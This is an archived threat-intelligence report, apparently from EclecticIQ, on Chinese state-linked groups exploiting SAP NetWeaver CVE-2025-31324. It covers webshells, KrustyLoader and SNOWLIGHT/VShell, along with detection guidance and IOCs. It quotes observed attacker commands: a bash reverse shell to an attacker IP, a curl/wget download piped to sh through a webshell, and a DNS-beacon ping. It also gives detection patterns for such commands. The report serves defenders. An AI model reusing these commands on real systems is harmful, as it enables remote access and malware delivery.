{
	"id": "21ad36f8-97e3-4b96-b4e9-e7ec4ce12b37",
	"created_at": "2026-04-06T00:18:50.795208Z",
	"updated_at": "2026-04-10T03:36:00.748745Z",
	"deleted_at": null,
	"sha1_hash": "6b112602db1be562da8ee50864a9da8e25889403",
	"title": "China-Nexus Nation State Actors Exploit SAP NetWeaver (CVE-2025-31324) to Target Critical Infrastructures",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2415661,
	"plain_text": "China-Nexus Nation State Actors Exploit SAP NetWeaver (CVE-2025-31324) to Target Critical Infrastructures\r\nArchived: 2026-04-05 12:42:53 UTC\r\nExecutive Summary\r\nEclecticIQ analysts assess with high confidence that, in April 2025, China-nexus nation-state APTs (advanced\r\npersistent threats) launched high-tempo exploitation campaigns against critical infrastructure networks by targeting SAP\r\nNetWeaver Visual Composer. Actors leveraged CVE-2025-31324 [1], an unauthenticated file upload vulnerability that\r\nenables remote code execution (RCE). This assessment is based on a publicly exposed directory (opendir) found on\r\nattacker-controlled infrastructure, which contained detailed event logs capturing operations across multiple\r\ncompromised systems.\r\nEclecticIQ analysts link the observed SAP NetWeaver intrusions to Chinese cyber-espionage units including UNC5221\r\n[2], UNC5174 [3], and CL-STA-0048 [4] based on threat actor tradecraft patterns. Mandiant and Palo Alto researchers\r\nassess that these groups connect to China's Ministry of State Security (MSS) or affiliated private entities. These actors\r\noperate strategically to compromise critical infrastructures, exfiltrate sensitive data, and maintain persistent access\r\nacross high-value networks worldwide.\r\nUncategorized China-Nexus Threat Actor Scanning the Internet for CVE-2025-31324\r\nand Uploading Webshells\r\nEclecticIQ analysts assess with high confidence that a very likely China-nexus threat actor is conducting a widespread\r\ninternet scanning and exploitation campaign against SAP NetWeaver systems. 
A threat actor–controlled server hosted at IP address 15.204.56[.]106 exposed the scope of the SAP NetWeaver intrusions [5].\r\nhttps://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures\r\nPage 1 of 19\n\nFigure 2 - Attacker controlled C2\r\nServer with OpenDir.\r\nThe threat actor hosted an openly accessible directory (opendir) on their server, which contained two result files generated\r\nusing Nuclei—a mass reconnaissance tool used to scan the internet for vulnerable SAP NetWeaver instances.\r\nThese files documented both the identification of exposed systems and successful exploitation attempts, offering\r\ninsight into the attacker's victimology:\r\nCVE-2025-31324-results.txt — documenting 581 SAP NetWeaver instances compromised and backdoored\r\nwith a Webshell.\r\n服务数据_20250427_212229.txt — Simplified Chinese–named (“service data”) file listing 1,800 domains\r\nrunning SAP NetWeaver, suggesting targets for future exploitation.\r\nEclecticIQ analysts assess with high confidence that the Chinese-language file names and attacker tradecraft across the\r\ncompromised infrastructure reinforce attribution to a Chinese-speaking operator.\r\nThe exposed opendir infrastructure reveals confirmed breaches and highlights the group’s planned targets, offering\r\nclear insight into both past and future operations.\r\nEclecticIQ analysts confirmed the presence of two Webshells, deployed post-exploitation to maintain persistent\r\nremote access to victim SAP systems:\r\n1. 
coreasp.js [6]:\r\nFigure 3 - Coreasp Webshell source code.\r\nUses AES/ECB encryption to receive and return data in encrypted form, evading network-based detection.\r\nCapable of interactive remote command execution.\r\nUses a hardcoded key (693e1b581ad84b87) to decrypt payloads received via HTTP POST requests.\r\nDynamically defines and loads Java classes in memory using reflection, allowing fileless code execution.\r\nStores the in-memory class in an HTTP session attribute (ti) to persist the backdoor across requests.\r\nDoes not log to disk, reducing forensic footprint and making detection through file I/O nearly impossible.\r\nClosely resembles Behinder/冰蝎 v3 [7], a well-known post-exploitation toolkit used by Chinese-speaking\r\nthreat actors.\r\n2. forwardsap.jsp [8]:\r\nFigure 4 - Forwardsap Webshell source code\r\nAccepts system commands via a query parameter named cmdhghgghhdd.\r\nExecutes remote commands using Runtime.getRuntime().exec() and returns output to the browser.\r\nOutputs command results in \u003cpre\u003e format, making it easy to view responses in the web UI.\r\nSmall and lightweight (≈20 lines of code), making it ideal for quick access or troubleshooting.\r\nLikely used as a fallback shell if the encrypted channel fails or is blocked.\r\nExposes system-level functionality with no authentication or obfuscation, posing immediate risk if discovered.\r\nEclecticIQ analysts observed these Webshells on exploited SAP NetWeaver systems; they were uploaded after\r\na POST request to the API endpoint:\r\n/developmentserver/metadatauploader\r\nVictimology Pattern Reveals Strategic Focus on Essential Services and 
Government\r\nEntities\r\nAnalysis of the opendir infrastructure reveals a targeted campaign against critical sectors across multiple countries.\r\nThe threat actor's victim selection reflects a strategic focus on essential services and government entities, as detailed below:\r\nUnited Kingdom\r\nCritical natural gas distribution networks\r\nWater \u0026 integrated waste management utilities\r\nUnited States\r\nAdvanced medical device manufacturing plants\r\nUpstream oil and gas exploration and production companies\r\nSaudi Arabia\r\nGovernment ministries responsible for investment strategy and financial regulation\r\nWhile many of the compromised entities are in the private sector, their functions, such as delivering water to\r\nhouseholds, distributing energy, or producing advanced medical technologies, are essential to public welfare and\r\nnational resilience.\r\nPersistent backdoor access to these systems provides a foothold for China-aligned APTs, potentially enabling\r\nstrategic objectives of the People’s Republic of China (PRC), including military, intelligence, or economic advantage.\r\nThe compromised SAP systems are also highly connected to the internal industrial control system (ICS) network,\r\nwhich poses lateral movement risks ranging from potential service disruption to long-term espionage.\r\nCL-STA-0048 Activity: Interactive Reverse Shell and DNS Beaconing on SAP\r\nEnvironments\r\nOn April 28, 2025, EclecticIQ analysts observed command-and-control (C2) traffic originating from compromised SAP\r\nNetWeaver systems. The traffic was directed to IP address 43.247.135[.]53, which resolved to the CL-STA-0048-linked\r\ndomain name sentinelones[.]com [9], indicating an active communication channel between breached\r\nenterprise infrastructure and the attacker's C2 infrastructure [10].\r\nCL-STA-0048, a Chinese state-backed APT tracked by Unit 42, has a consistent track record of targeting strategic\r\nsectors across South Asia. 
EclecticIQ analysts assess with high confidence that this group is likely behind the observed\r\nSAP NetWeaver intrusions. This assessment is based on overlaps in post-exploitation tactics, such as using the ping\r\ncommand for DNS beaconing, and on shared infrastructure.\r\nFigure 5 - Link analysis with report from Palo Alto Unit42 researchers.\r\nAnalysts observed multiple reverse shell attempts over TCP port 10443 directed at 43.247.135[.]53, including payloads\r\nsuch as:\r\nFigure 6 - Network Event logs showing command execution.\r\n/bin/bash -i \u003e\u0026 /dev/tcp/43.247.135[.]53/10443 0\u003e\u00261\r\ncurl http://43.247.135[.]53:10443\r\nThe threat actors used these commands to establish interactive C2 sessions with direct reverse shell access.\r\nEclecticIQ analysts assess with medium confidence that China-nexus group CL-STA-0048 is also likely linked to\r\nactivities observed by Fortinet on October 11, 2024 [11].\r\nAccording to network event logs (Figure 6), EclecticIQ analysts assess with medium confidence that threat actor CL-STA-0048 likely initiated DNS-based beaconing at 08:50:34 AM. 
The actor sent a ping command to a subdomain of\r\n*.oastify.com, just 94 seconds after executing a reverse shell bash command via HTTP to C2 IP address\r\n43.247.135[.]53 at 08:49:00 AM.\r\nObserved Command:\r\nping -c 1 aaa.ki6zmfw3ps8q14rfbfczfq5qkhq8e12q.oastify.com\r\nThis command triggered DNS A record resolution—likely a tactic to verify successful exploitation.\r\nResolved IPs via DNS:\r\nFigure 7 - Resolved IP address in DNS A record.\r\n54.77.139[.]23 (oastify[.]com subdomains)\r\n3.248.33[.]252 (Threat actor IP interacting with Webshell – per Fortinet)\r\nThe observed IP addresses in SAP NetWeaver intrusions are also linked to Fortinet’s report, which identifies both IPs\r\nas part of the infrastructure used in exploiting Ivanti CSA vulnerabilities (CVE-2024-8963 \u0026 CVE-2024-9380) [12].\r\nEnumeration Techniques Observed in SAP NetWeaver Intrusions\r\nFollowing initial compromise via CVE-2025-31324, the China-nexus threat actors conducted reconnaissance on\r\ninfected SAP NetWeaver hosts by executing remote Linux commands using Webshells.\r\nAnalysis of nearly 5,000 malicious commands executed across multiple victims clearly indicates that the threat actor\r\nperformed network-level discovery and mapped SAP-specific applications. The actor's goal was to identify backup\r\ndetails and use this metadata for lateral movement.\r\nIn most of the incidents, threat actors performed network discovery using commands like arp -a and by parsing\r\n/etc/hosts. 
Their goal was to identify nearby systems that could serve as pivots for lateral movement, including targets\r\nwithin cloud-connected infrastructure like AWS workloads and Entra ID (formerly Azure AD) identities.\r\nThe following table summarizes observed enumeration goals, techniques, and tools:\r\nFigure 8 – Enumeration commands executed in victim system.\r\nAccording to results from the attacker infrastructure, many compromised systems were running on VMware ESXi\r\nhypervisors. These systems were directly connected to the internal network of the business without any segmentation\r\nor firewall, further increasing the risk of lateral movement attacks that could increase the impact of the SAP\r\nNetWeaver intrusions.\r\nKrustyLoader Delivered via Threat Actor-Controlled AWS S3 Buckets\r\nEclecticIQ analysts identified an intrusion pattern involving the deployment of KrustyLoader [13]. A China-nexus APT\r\nleveraged a Webshell at /irj/helper.jsp to execute arbitrary remote commands and initiate the malware delivery process\r\nin compromised SAP NetWeaver systems.\r\nFigure 9 – EclecticIQ TIP graph analysis showing links between different intrusions and threat actors.\r\nThe attackers leveraged Linux Bash one-liners to retrieve and decode a base64-encoded KrustyLoader payload hosted\r\non attacker-controlled Amazon S3 buckets. 
Using built-in system utilities such as curl and wget, they downloaded\r\nKrustyLoader, enabling its execution while evading traditional security filters by abusing trusted AWS infrastructure.\r\nIdentified Amazon S3 Domains Hosting KrustyLoader:\r\napplr-malbbal.s3.ap-northeast-2.amazonaws[.]com\r\nabode-dashboard-media.s3.ap-south-1.amazonaws[.]com (also observed by Volexity on January 18, 2024 [14])\r\nbrandnav-cms-storage.s3.amazonaws[.]com\r\nFigure 10 – Downloading malicious payload from remote host.\r\nNetwork telemetry logs in Figure 10 show repeated outbound connections to these domains, confirming the role\r\nof Amazon S3 in the malware delivery chain. The threat actors abused the legitimate AWS cloud service to mask their\r\nmalicious activity and evade detection.\r\nKrustyLoader is a Rust-based malware loader designed to deliver Sliver backdoors in post-exploitation scenarios [15].\r\nIndustry researchers initially identified KrustyLoader following the exploitation of Ivanti Connect Secure VPN zero-days (CVE-2024-21887 and CVE-2023-46805). These intrusions were attributed to threat actor clusters (per Volexity)\r\n[16] and UNC5221 (per Mandiant) [17]. Available evidence does not conclusively attribute KrustyLoader itself to\r\nUNC5221.\r\nKrustyLoader’s purpose is to evade detection while reliably maintaining persistence across compromised Linux\r\nsystems. 
Once deployed, KrustyLoader executes a series of anti-analysis and environmental checks before proceeding:\r\nReads and deletes its own binary to reduce forensic visibility.\r\nVerifies it is executing from the /tmp/ directory and aborts otherwise.\r\nPerforms anti-debugging checks, including scanning for debugger strings (e.g., gdb, lldb) in /proc/self/exe.\r\nExits early if the parent process ID equals 1 or if specific temporary files are missing.\r\nIf these checks pass, the loader decrypts a hardcoded staging URL using a three-step obfuscation chain—hex\r\ndecoding, XOR transformation, and AES-128-CFB decryption. It then retrieves an encrypted payload, writes it to a file\r\nin /tmp/, marks it executable, and launches it.\r\nKrustyLoader serves four strategic functions in an attacker’s arsenal:\r\nDelivering second-stage payloads like Sliver\r\nEstablishing persistence by evading common analysis and sandbox triggers\r\nExecuting arbitrary shell commands in a post-exploitation environment\r\nMaintaining C2 communication via attacker-controlled infrastructure\r\nIts use of the Rust programming language introduces inherent obfuscation due to static linking, stripped symbols, and\r\ncomplex control flows—complicating reverse engineering efforts.\r\nUNC5174 Activity: Deploying SNOWLIGHT Downloader to Execute VShell Remote\r\nAccess Trojan (RAT)\r\nEclecticIQ analysts assess with high confidence that the threat actor UNC5174 is very likely actively exploiting\r\nvulnerable SAP NetWeaver systems to deploy a multi-stage malware chain involving the SNOWLIGHT downloader\r\n[18], a Go-based Remote Access Trojan (RAT) called VShell [19], and GOREVERSE [20], a backdoor that\r\noperates over Secure Shell (SSH). 
Google threat researchers linked UNC5174 to the Chinese threat nexus, identifying\r\nit as an initial access broker likely associated with the Ministry of State Security (MSS).\r\nEclecticIQ observed that on April 28, 2025, UNC5174 very likely deployed a Webshell in SAP NetWeaver to execute a\r\nBash command via the endpoint helper.jsp.\r\nFigure 11 - Downloading malicious bash script from remote host.\r\nGET /irj/helper.jsp?cmd=(curl -fsSL -m180 http://103.30.76[.]206:443/slt || wget -T180 -q\r\nhttp://103.30.76[.]206:443/slt)|sh\r\nThe Bash script downloads and executes another shell script named SLT.sh. This script identifies the system\r\narchitecture of the compromised host and downloads the appropriate SNOWLIGHT binary using available tools such\r\nas curl, wget, or python.\r\nFigure 12 - Bash script code in SLT.sh.\r\nThe script is designed to adapt to the victim operating system by executing payloads from multiple directories and\r\nmanipulating the system PATH to prioritize malicious binaries—tactics consistent with post-exploitation staging seen\r\nin prior UNC5174 campaigns.\r\nBased on the behaviour of SLT.sh and the subsequent execution of SNOWLIGHT, EclecticIQ assesses that UNC5174 is\r\nseeking to establish architecture-aware, persistent access through in-memory malware. 
This is in line with the group’s\r\nhistorically stealth-oriented operational profile.\r\nSNOWLIGHT Execution and VShell RAT Deployment\r\nThe SNOWLIGHT binary acts as a loader that initiates a connection with a hardcoded command-and-control (C2)\r\nserver at 103.30.76[.]206 over TCP port 443.\r\nFigure 13 – Disassembled SNOWLIGHT sample showing static C2 IP address.\r\nOnce connected, SNOWLIGHT performs a simple handshake (including sending a tag like \"l64\" and host metadata),\r\nthen receives a second-stage payload that is XOR-encoded using the key 0x99. This payload is decrypted in memory,\r\nthen executed using the memfd_create system call (syscall 319) and fexecve, allowing for complete in-memory\r\nexecution without touching disk.\r\nFigure 14 - XOR decryption routine that uses 0x99 as the key.\r\nEclecticIQ analysts identified the second-stage implant as an in-memory variant of VShell, an open-source RAT used\r\nfor persistent remote control.\r\nFigure 15 - Example of a VShell C2 Server published in Chinese forums.\r\nVShell is executed under a process name like [kworker/0:2] to masquerade as a benign kernel thread—an obfuscation\r\ntechnique frequently used in UNC5174 operations to avoid detection in process listings.\r\nFigure 16 - Static process name kworker/0:2 inside the SNOWLIGHT sample.\r\nHistorical Context and Attribution Confidence for UNC5174\r\nEclecticIQ’s assessment aligns with earlier findings from Google Mandiant and Sysdig, which have attributed similar\r\nTTPs to UNC5174. Mandiant previously linked UNC5174 to the exploitation of F5 BIG-IP (CVE-2023-46747) and\r\nConnectWise ScreenConnect (CVE-2024-1709). 
Both of these vulnerabilities were used to deploy the SNOWLIGHT\r\ndownloader.\r\nThese campaigns demonstrated UNC5174’s ability to leverage public vulnerabilities in their tradecraft and to maintain\r\na modular infection chain built around the SNOWLIGHT downloader.\r\nSysdig’s research further confirmed the use of VShell by UNC5174 in cloud-native and containerized environments,\r\nwhere the group used in-memory implants and runtime evasion tactics. The reuse of SNOWLIGHT and VShell in the\r\nSAP NetWeaver intrusions observed by EclecticIQ analysts provides strong supporting evidence of actor continuity\r\nand of their targeting of enterprise infrastructure.\r\nGiven the consistent infrastructure, malware reuse, and tactical overlap, EclecticIQ assesses with high confidence that\r\nthis activity is very likely attributable to UNC5174 and represents an ongoing campaign to exploit high-value\r\nenterprise systems.\r\nChina-Aligned APT Focus on Public-Facing Enterprise Applications for Long-Term\r\nStrategic Access\r\nEclecticIQ analysts assess with high confidence that China-linked APTs are highly likely to continue targeting internet-exposed enterprise applications and edge devices to establish long-term strategic and persistent access to critical\r\ninfrastructure networks globally.\r\nTheir focus on widely used platforms like SAP NetWeaver is a strategic move, as these systems are deeply integrated\r\ninto enterprise environments and often host unpatched vulnerabilities.\r\nBy compromising such applications, China-nexus APTs can gain high-privilege access to internal networks, including\r\ncloud services, VMware ESXi virtual machines, and operationally critical IoT/OT devices.\r\nThis enables cyber espionage, sustained surveillance, and potential disruption during geopolitical crises involving\r\nChina. 
The exposure of these essential systems transforms technical vulnerabilities into serious national and economic\r\nsecurity threats, given their foundational role in government and business operations.\r\nPrevention Strategies\r\n- Apply SAP Security Note #3594142 immediately on all affected systems (SAP NetWeaver 7.1x with\r\nVCFRAMEWORK).\r\n- If patching is not possible, implement the recommended workaround from SAP Note #3593336:\r\n  - Complete removal of sap.com/devserver_metadataupload_ear.\r\n- Restrict access to /developmentserver/metadatauploader to internal, authenticated IP ranges.\r\n- Block unauthenticated or public network access via WAF/firewall rules.\r\nDetection and Threat Hunting Strategies\r\nFile-system IOC sweep (Linux \u0026 Windows SAP hosts)\r\nInspect for unauthorised web-executable files in the Visual Composer paths:\r\n…/irj/servlet_jsp/irj/work\r\n…/irj/servlet_jsp/irj/work/sync\r\n…/irj/servlet_jsp/irj/root\r\nAutomate with:\r\nfind . 
-type f \\( -name \"*.jsp\" -o -name \"*.java\" -o -name \"*.class\" \\) -ls\r\nFlag any of the following:\r\nKnown webshells (helper.jsp, cache.jsp, usage.jsp, .webhelper.jsp, forwardsap.jsp, 404_error.jsp,\r\n.h.jsp)\r\nRandomised names:\r\n8-character pattern [a-z]{8}.jsp\r\nVariable-length alphanumerics ≤ 10 chars\r\nWeb-access log analytics\r\nTrace hits on /irj/*.jsp?cmd= to surface webshell command execution.\r\nProcess \u0026 command-line heuristics (EDR/Sysmon)\r\nbash or sh processes containing Base64 decode plus curl/wget:\r\nprocess == \"bash\" \u0026\u0026 command_includes(\"base64 -d\").\r\ncurl or wget writing to /tmp (or %TEMP% on Windows) then chmod/execute.\r\nPython one-liners opening sockets or duplicating FDs:\r\nprocess == \"python*\" \u0026\u0026 command_includes(\"socket\") \u0026\u0026 command_includes(\"dup2\").\r\nNetwork \u0026 proxy monitoring\r\nQuery NetWeaver System Info for VCFRAMEWORK; flag any instance where the version is \u003c the patched build in\r\nSAP Note 3594142.\r\nHunt for successful logins that occur immediately after webshell activity or from atypical source IPs.\r\nMITRE ATT\u0026CK Matrix\r\nIndicator of Compromise (IOC)\r\nUncategorized China-Nexus actor (internet-wide CVE-2025-31324 scanning):\r\n- 15.204.56[.]106 (opendir server hosting logs, web-shells, target lists)\r\n  - 4c9e60cc73e87da4cadc51523690d67549de4902e880974bfacf7f1a8dc40d7d\r\n  - 63aa0c6890ec5c16b872fb6d070556447cd707dfba185d32a2c10c008dbdbcdd\r\nCL-STA-0048 (reverse-shell \u0026 DNS-beaconing)\r\n- 43.247.135[.]53 (resolves to sentinelones[.]com, TCP 10443)\r\n- aaa.ki6zmfw3ps8q14rfbfczfq5qkhq8e12q.oastify.com\r\n- 54.77.139[.]23\r\n- 3.248.33[.]252\r\nKrustyLoader ➞ Sliver 
chain\r\n- applr-malbbal.s3.ap-northeast-2.amazonaws[.]com\r\n  - f92d0cf4d577c68aa615797d1704f40b14810d98b48834b241dd5c9963e113ec\r\n- abode-dashboard-media.s3.ap-south-1.amazonaws[.]com (also seen in earlier 2024 ops)\r\n  - 47ff0ae9220a09bfad2a2fb1e2fa2c8ffe5e9cb0466646e2a940ac2e0cf55d04\r\n  - 3f14dc65cc9e35989857dc1ec4bb1179ab05457f2238e917b698edb4c57ae7ce\r\n  - 91f66ba1ad49d3062afdcc80e54da0807207d80a1b539edcdbd6e1bf99e7a2ca\r\n- brandnav-cms-storage.s3.amazonaws[.]com\r\n  - c71da1dfea145798f881afd73b597336d87f18f8fd8f9a7f524c6749a5c664e4\r\n  - b8e56de3792dbd0f4239b54cfaad7ece3bd42affa4fbbdd7668492de548b5df8\r\n  - 0c2c8280701706e0772cb9be83502096e94ad4d9c21d576db0bc627e1e84b579\r\n  - 5f3d1f17033d85b85f3bd5ae55cb720e53b31f1679d52986c8d635fd1ce0c08a\r\nUNC5174 (SNOWLIGHT ➞ VShell chain \u0026 GOREVERSE)\r\n- 103.30.76[.]206 (TCP 443 used by SNOWLIGHT handshake)\r\n  - 2dcbb4138f836bb5d7bc7d8101d3004848c541df6af997246d4b2a252f29d51a\r\n  - 00920e109f16fe61092e70fca68a5219ade6d42b427e895202f628b467a3d22e\r\n  - b9533ce8e428f16f3d0e1946f19a6f756ff11a532d0b7e61ae402837f46c678e\r\n- ocr-freespace.oss-cn-beijing.aliyuncs[.]com/2025/config.sh (GOREVERSE)\r\n  - 888e953538ff668104f838120bc4d801c41adb07027db16281402a62f6ec29ef\r\n  - 5e24b41a0bd076ec2b4e49e66daac94396c6180d00a45bcd7f4342a385fa1eed\r\nIP Address Observed in SAP NetWeaver Intrusion Victims:\r\nReferences\r\n[1] “Active Exploitation of SAP NetWeaver Visual Composer CVE-2025-31324 | Rapid7 Blog,” Rapid7. Accessed: May 06, 2025. [Online]. Available: https://www.rapid7.com/blog/post/2025/04/28/etr-active-exploitation-of-sap-netweaver-visual-composer-cve-2025-31324/\r\n[2] “UTA0178 (Threat Actor).” Accessed: May 06, 2025. [Online]. Available: https://malpedia.caad.fkie.fraunhofer.de/actor/uta0178\r\n[3] “UNC5174 (Threat Actor).” Accessed: May 06, 2025. [Online]. Available: https://malpedia.caad.fkie.fraunhofer.de/actor/unc5174\r\n[4] “CL-STA-0048 Archives,” Unit 42. Accessed: May 06, 2025. [Online]. Available: https://unit42.paloaltonetworks.com/tag/cl-sta-0048/\r\n[5] “FOFA Search Engine,” FOFA. Accessed: May 06, 2025. [Online]. Available: https://fofa.info\r\n[6] “VirusTotal - File - 4c9e60cc73e87da4cadc51523690d67549de4902e880974bfacf7f1a8dc40d7d.” Accessed: May\r\n06, 2025. [Online]. 
Available:\r\nhttps://www.virustotal.com/gui/file/4c9e60cc73e87da4cadc51523690d67549de4902e880974bfacf7f1a8dc40d7d\r\n[7] rebeyond, rebeyond/Behinder. (May 06, 2025). Accessed: May 06, 2025. [Online]. Available:\r\nhttps://github.com/rebeyond/Behinder\r\n[8] “VirusTotal - File - 63aa0c6890ec5c16b872fb6d070556447cd707dfba185d32a2c10c008dbdbcdd.” Accessed: May\r\n06, 2025. [Online]. Available:\r\nhttps://www.virustotal.com/gui/file/63aa0c6890ec5c16b872fb6d070556447cd707dfba185d32a2c10c008dbdbcdd/detection\r\n[9] “VirusTotal - Domain - sentinelones.com.” Accessed: May 06, 2025. [Online]. Available:\r\nhttps://www.virustotal.com/gui/domain/sentinelones.com/relations\r\n[10] L. R. Zemah Yoav, “CL-STA-0048: An Espionage Operation Against High-Value Targets in South Asia,” Unit 42.\r\nAccessed: May 06, 2025. [Online]. Available: https://unit42.paloaltonetworks.com/espionage-campaign-targets-south-asian-entities/\r\n[11] F. A. M. Q. Reyes John Simmons, Jared Betts, Luca Pugliese, Trent Healy, Ken Evans, Robert, “Burning Zero\r\nDays: Suspected Nation-State Adversary Targets Ivanti CSA | FortiGuard Labs,” Fortinet Blog. Accessed: May 06,\r\n2025. [Online]. Available: https://www.fortinet.com/blog/threat-research/burning-zero-days-suspected-nation-state-adversary-targets-ivanti-csa\r\n[12] “Security Advisory Ivanti CSA (Cloud Services Application) (CVE-2024-9379, CVE-2024-9380, CVE-2024-\r\n9381).” Accessed: May 06, 2025. [Online]. Available: https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-Cloud-Services-Appliance-CVE-2024-9379-CVE-2024-9380-CVE-2024-9381?language=en_US\r\n[13] “KrustyLoader (Malware Family).” Accessed: May 06, 2025. [Online]. Available:\r\nhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.krustyloader\r\n[14] Volexity, “Ivanti Connect Secure VPN Exploitation: New Observations,” Volexity. 
Accessed: May 06, 2025.\r\n[Online]. Available: https://www.volexity.com/blog/2024/01/18/ivanti-connect-secure-vpn-exploitation-new-observations/\r\n[15] “KrustyLoader - Rust malware linked to Ivanti ConnectSecure compromises,” Synacktiv. Accessed: May 06,\r\n2025. [Online]. Available: https://www.synacktiv.com/publications/krustyloader-rust-malware-linked-to-ivanti-connectsecure-compromises\r\n[16] S. Adair, “Active Exploitation of Two Zero-Day Vulnerabilities in Ivanti Connect Secure VPN,” Volexity.\r\nAccessed: May 06, 2025. [Online]. Available: https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/\r\n[17] “Cutting Edge: Suspected APT Targets Ivanti Connect Secure VPN in New Zero-Day Exploitation,” Google\r\nCloud Blog. Accessed: May 06, 2025. [Online]. Available: https://cloud.google.com/blog/topics/threat-intelligence/suspected-apt-targets-ivanti-zero-day\r\n[18] “Bringing Access Back — Initial Access Brokers Exploit F5 BIG-IP (CVE-2023-46747) and ScreenConnect,”\r\nGoogle Cloud Blog. Accessed: May 06, 2025. [Online]. Available: https://cloud.google.com/blog/topics/threat-intelligence/initial-access-brokers-exploit-f5-screenconnect\r\n[19] A. Rizzo, “UNC5174’s evolution in China’s ongoing cyber warfare: From SNOWLIGHT to VShell,” Sysdig.\r\nAccessed: May 06, 2025. [Online]. Available: https://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/\r\n[20] C. L. Li Vincent, “Threat Actors Exploit GeoServer Vulnerability CVE-2024-36401 | FortiGuard Labs,” Fortinet\r\nBlog. Accessed: May 06, 2025. [Online]. 
Available: https://www.fortinet.com/blog/threat-research/threat-actors-exploit-geoserver-vulnerability-cve-2024-36401\r\nSource: https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY"
	],
	"references": [
		"https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures"
	],
	"report_names": [
		"china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures"
	],
	"threat_actors": [
		{
			"id": "b2e48aa5-0dea-4145-a7e5-9a0f39d786d8",
			"created_at": "2024-01-18T02:02:34.643994Z",
			"updated_at": "2026-04-10T02:00:04.959645Z",
			"deleted_at": null,
			"main_name": "UNC5221",
			"aliases": [
				"UNC5221",
				"UTA0178"
			],
			"source_name": "ETDA:UNC5221",
			"tools": [
				"BRICKSTORM",
				"GIFTEDVISITOR",
				"GLASSTOKEN",
				"LIGHTWIRE",
				"PySoxy",
				"THINSPOOL",
				"WARPWIRE",
				"WIREFIRE",
				"ZIPLINE"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "6ce34ba9-7321-4caa-87be-36fa99dfe9c9",
			"created_at": "2024-01-12T02:00:04.33082Z",
			"updated_at": "2026-04-10T02:00:03.517264Z",
			"deleted_at": null,
			"main_name": "UTA0178",
			"aliases": [
				"UNC5221",
				"Red Dev 61"
			],
			"source_name": "MISPGALAXY:UTA0178",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b302cfdb-30c9-4dce-a968-d2398dda820d",
			"created_at": "2024-03-28T02:00:05.789775Z",
			"updated_at": "2026-04-10T02:00:03.611467Z",
			"deleted_at": null,
			"main_name": "UNC5174",
			"aliases": [
				"Uteus"
			],
			"source_name": "MISPGALAXY:UNC5174",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8bcbeb8a-111b-4ea1-a72b-5c7abd8ef132",
			"created_at": "2025-11-01T02:04:53.050049Z",
			"updated_at": "2026-04-10T02:00:03.774442Z",
			"deleted_at": null,
			"main_name": "BRONZE SNOWDROP",
			"aliases": [
				"UNC5174 "
			],
			"source_name": "Secureworks:BRONZE SNOWDROP",
			"tools": [
				"Metasploit",
				"SNOWLIGHT",
				"SUPERSHELL",
				"Sliver",
				"VShell"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "1820b6d5-4c68-4c37-bd25-034fd77cf1bf",
			"created_at": "2026-01-17T02:00:03.195495Z",
			"updated_at": "2026-04-10T02:00:03.89438Z",
			"deleted_at": null,
			"main_name": "CL-STA-0048",
			"aliases": [
				"CL STA 0048"
			],
			"source_name": "MISPGALAXY:CL-STA-0048",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434730,
	"ts_updated_at": 1775792160,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6b112602db1be562da8ee50864a9da8e25889403.pdf",
		"text": "https://archive.orkl.eu/6b112602db1be562da8ee50864a9da8e25889403.txt",
		"img": "https://archive.orkl.eu/6b112602db1be562da8ee50864a9da8e25889403.jpg"
	}
}